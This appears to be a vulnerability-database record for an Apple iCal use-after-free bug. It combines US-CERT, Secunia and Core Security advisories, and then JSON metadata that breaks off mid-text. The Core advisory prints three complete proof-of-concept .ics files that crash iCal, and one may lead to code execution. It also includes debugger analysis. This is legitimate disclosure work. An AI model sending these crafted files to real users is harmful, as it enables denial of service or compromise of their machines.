var-200805-0584
Vulnerability from variot
Use-after-free vulnerability in Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to trigger memory corruption or possibly execute arbitrary code via an "ATTACH;VALUE=URI:S=osumi" line in a .ics file, which triggers a "resource liberation" bug. NOTE: CVE-2008-2007 was originally used for this issue, but this is the appropriate identifier. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Attackers can leverage this issue to execute arbitrary code with the privileges of the affected application. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability.
I. Further details are available in the US-CERT Vulnerability Notes Database.
II.
III.
IV. Please send email to cert@cert.org with "TA08-150A Feedback VU#566875" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2008 by US-CERT, a government organization. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory.
2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service).
3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit).
4) Multiple unspecified errors exist in the processing of Pixlet video files.
5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed.
Successful exploitation may allow execution of arbitrary code.
6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request.
7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument.
8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened.
9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types.
10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information.
11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system.
For more information: SA28083
12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed.
Successful exploitation may allow execution of arbitrary code.
13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information.
14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks.
15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture.
16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory.
17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerabilities are caused due to the use of vulnerable libpng code.
For more information: SA27093 SA27130
18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed.
Successful exploitation of this vulnerability may allow execution of arbitrary code.
19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6.
20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information.
For more information: SA28323
21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords.
22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed.
ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897
OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/
SA18307: http://secunia.com/advisories/18307/
SA26273: http://secunia.com/advisories/26273/
SA26636: http://secunia.com/advisories/26636/
SA27093: http://secunia.com/advisories/27093/
SA27130: http://secunia.com/advisories/27130/
SA28081: http://secunia.com/advisories/28081/
SA28083: http://secunia.com/advisories/28083/
SA28323: http://secunia.com/advisories/28323/
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in iCal
Advisory Information
Title: Multiple vulnerabilities in iCal Advisory ID: CORE-2008-0126 Advisory URL: http://www.coresecurity.com/?action=item&id=2219 Date published: 2008-05-21 Date of last update: 2008-05-21 Vendors contacted: Apple Inc. Release mode: Coordinated release
Vulnerability Information
Class: Input Validation
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq ID: 28629 28632 28633
CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007
Vulnerability Description
iCal is a personal calendar application from Apple Inc. The calendar application can be used as a stand-alone application or as a client-side component to calendar server that lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the '.ics' filename extension) [1] and the CalDAV protocol for calendar sharing [2]. There is a growing number of web sites providing calendars files and open subscription to calendar updates [3][4][5].
The other two vulnerabilities lead to abnormal termination (crash) of the iCal application due to null-pointer dereference bugs triggered while parsing a malformed '.ics' files.
Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted '.ics' file send over email or hosted on a malicious web server; or without direct user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server.
Vulnerable Packages
. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard).
Non-vulnerable Packages
. Available through Apple security updates (see vendor information below).
Vendor Information, Solutions and Workarounds
The following information was provided by the vendor:
Availability
Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/
Cross-References
If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222
Credits
These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicous .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format.
1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)
Improper sanitization of integer input may lead to null pointer dereference and possibly to an application that loses control of its execution, resulting in a denial of service.
A vulnerable .ics file will contain the following line:
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
- -----------/
The 'COUNT' value causes an integer overflow, which leads to a null pointer dereference when iCal tries to use it after the .ics file is imported.
The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events.
/-----------
BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME: Vulnerable VERSION:2.0 X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:4 DTSTART;TZID=America/Buenos_Aires:20071225T110000 DURATION:PT1H UID:48878014-5F03-43E5-8639-61E708714F9A DTSTAMP:20071213T130632Z SUMMARY:Vuln CREATED:20071213T130611Z RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 END:VEVENT END:VCALENDAR
- -----------/
Analysis of the vulnerability
The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer 'EDI=0'. Only the value of 'EAX' is under control, must be less than '0x7fffffff' and is extracted from the following line of the PoC '.ics' file.
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE) - -----------/
/-----------
__text:0013C178 push ebp __text:0013C179 mov ebp, esp __text:0013C17B sub esp, 38h __text:0013C17E mov eax, ds:off_1F435C __text:0013C183 mov [ebp+var_4], edi __text:0013C186 mov edi, [ebp+arg_C] __text:0013C189 mov [ebp+var_8], esi __text:0013C18C mov esi, [ebp+arg_8] __text:0013C18F mov [ebp+var_C], ebx __text:0013C192 mov [esp+38h+var_34], eax __text:0013C196 mov eax, [ebp+arg_0] __text:0013C199 mov [esp+38h+var_28], 0 __text:0013C1A1 mov [esp+38h+var_2C], 0
- -----------/
Here is written on '[ebp + var28]' and '[ebp + var2C]' and because 'EBP' is 'ESP' minus '0x38', this is similar to
/-----------
[ebp + var28] = [esp+0x38+var_28] [ebp + var2C] = [esp+0x38+var_2C]
- -----------/
There are located the null-pointers on the stack.
/-----------
BFFFEF7C var_2C dd 0 BFFFEF80 var_28 dd 0
- -----------/
Upon reaching the function where the crash occurs.
/-----------
__text:0014ADC3 push ebp __text:0014ADC4 mov ebp, esp __text:0014ADC6 sub esp, 48h __text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass
- -----------/
Logically the zeros are still present because don't work with those values until we enter.
/-----------
BFFFEF7C arg_C dd 0 BFFFEF80 arg_10 dd 0
- -----------/
We see that the function argument 'arg_C' is loaded and moved to 'EDI'.
/-----------
0014ADE0 mov edi, [ebp+arg_C]
- -----------/
And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed.
/-----------
0014AE2F mov dword ptr [edi], 0
- -----------/
When getting closer to the point of crash because we control 'EAX' and we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'.
/-----------
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1) 0014AE23 jl short loc_14AE2F
0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F) 0014AE2D jle short loc_14AE37
169280B8 dd 270Fh (ebx+08) 169280BC dd 1 (ebx+0C)
- -----------/
The first comparison for 'JL' doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location.
In the other case a comparison is made such that if 'EAX' is less than '0x270f' the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than '0x7fffffff' the maximum value is used instead.
2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)
A vulnerable .ics file will contain the following line:
/-----------
TRIGGER:-PT65535H
- -----------/
The 'TRIGGER' value causes a null pointer dereference when iCal tries to use it after the .ics file is imported.
The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and accept it without changes.
/-----------
BEGIN:VCALENDAR X-WR-CALNAME:Fake event PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN VERSION:2.0 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:10 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T124414Z SUMMARY:Fake Event DTEND;TZID=America/Buenos_Aires:20071225T010000 RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 TRANSP:OPAQUE CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT65535H END:VALARM END:VEVENT END:VCALENDAR
- -----------/
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)
This is another case of bad validation of a file with the iCalendar format that results in a more serious bug.
A vulnerable .ics file will contain the following line:
/-----------
ATTACH;VALUE=URI:S=osumi
- -----------/
The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list.
/-----------
BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME:evento falso VERSION:2.0 X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:11 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T143420Z SUMMARY:evento falso DTEND;TZID=America/Buenos_Aires:20071225T010000 LOCATION:donde se hace RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 TRANSP:OPAQUE UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 URL;VALUE=URI:http://pepe.com:443/pepe ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php
CREATED:20071213T142720Z CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT15H END:VALARM BEGIN:VALARM X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0 ACTION:AUDIO TRIGGER:-PT15M ATTACH;VALUE=URI:S=osumi END:VALARM END:VEVENT END:VCALENDAR
- -----------/
Report Timeline
. 2008-01-30: Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available. 2008-01-31: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft, including proof-of-concept files that trigger the bugs. 2008-02-12: Core requests update info on the vulnerabilities and states that wants to coordinate the date of the disclosure. 2008-02-18: Core requests update info on the vulnerabilities. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update. 2008-02-19: Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, will dealt bydealing with the three vulnerabilities in the iCal client application will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case if Core considers that the information provided in the advisory would help end users to decide how to react the advisory would be published sooner as a "forced release". 2008-03-03: Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds". 2008-03-04: Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server. 2008-03-13: Core re-schedules the publication to March 24th and requests the vendor an update on the coordinated date of disclosure. The remaining three vulnerabilities in the iCal client application will be dealt by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes. 2008-03-18: APPLE-SA-2008-0318 software update released. 2008-03-18: CORE-2008-0123 is published. 2008-03-18: Vendor informs that will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fix them. Additional timing information will be provided closer to the estimated date. 2008-03-18: Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor. 2008-04-04: Core requests a more precise date of release of the fixes to coordinate the publication and recommends the vendor to consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited. 2008-04-07: Vendor requests that Core to postpone the advisory publication until the fix is available. 2008-04-07: Core requests a more precise date of release of the fixes to coordinate the new publication date. 2008-04-07: Vendor informs that the estimated date for the update is near the end of April. 2008-04-08: Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable. 2008-04-16: Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated date and provides more details that explain why the first two bugs are been considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer which later triggers a null pointer de-reference that causes the application to crash. the root cause of the crash is a NULL pointer de-reference and not an integer overflow. 2008-04-17: Core confirms that the two first bugs can be considered crashes due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes. 2008-04-17: Vendor asks confirmation that the first two bugs have no security related consequences. 2008-04-17: Core responds that the three bugs still have security related consequences. The first two bugs can be abuse to execute denial of service attacks by untrusted and unauthenticated third parties specifically using public server as attack vector. Core considers bug that allow unauthenticated third parties to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem. 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software fixes release. 2008-05-05: Core informs the vendor that it's re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being released sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule publication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory. 2008-05-12: Core communicates the vendor that the publication of the advisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21: An edited and corrected final version of the advisory is sent to the vendor. 2008-05-21: Advisory CORE-2008-0126 is published.
References
[1] RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445 [2] RFC 4791: Calendaring Extensions to WebDAV - http://tools.ietf.org/html/rfc4791 [3] http://www.apple.com/downloads/macosx/calendars/ [4] iCalShare http://icalshare.com/ [5] iCalWorld http://www.icalworld.com/
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200805-0584",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ical",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "3.0.1"
},
{
"model": "mac os x",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.3"
},
{
"model": "mac os x server",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os server",
"scope": "ne",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.6,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
}
],
"sources": [
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Melissa O\u0027NeillPaul HaddadRodrigo CarvalhoGynvael Coldwind",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
}
],
"trust": 0.6
},
"cve": "CVE-2008-1035",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2008-1035",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-31160",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-1035",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2008-1035",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200806-030",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-31160",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Use-after-free vulnerability in Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to trigger memory corruption or possibly execute arbitrary code via an \"ATTACH;VALUE=URI:S=osumi\" line in a .ics file, which triggers a \"resource liberation\" bug. NOTE: CVE-2008-2007 was originally used for this issue, but this is the appropriate identifier. \nThe security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. \nAttackers can leverage this issue to execute arbitrary code with the privileges of the affected application. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. \nNOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability. \n\nI. Further\n details are available in the US-CERT Vulnerability Notes Database. \n\nII. \n\nIII. \n\nIV. Please send\n email to \u003ccert@cert.org\u003e with \"TA08-150A Feedback VU#566875\" in the\n subject. \n _________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n _________________________________________________________________\n\n Produced 2008 by US-CERT, a government organization. ----------------------------------------------------------------------\n\nSecunia Network Software Inspector 2.0 (NSI) - Public Beta\n\nThe Public Beta has ended. Thanks to all that participated. \n\n1) An error in AFP server allows connected users or guests to access\nfiles and directories that are not within a shared directory. \n\n2) Some vulnerabilities in Apache can be exploited by malicious\npeople to conduct cross-site scripting attacks or to cause a DoS\n(Denial of Service). \n\n3) An unspecified error in AppKit can potentially be exploited to\nexecute arbitrary code when a user opens a specially 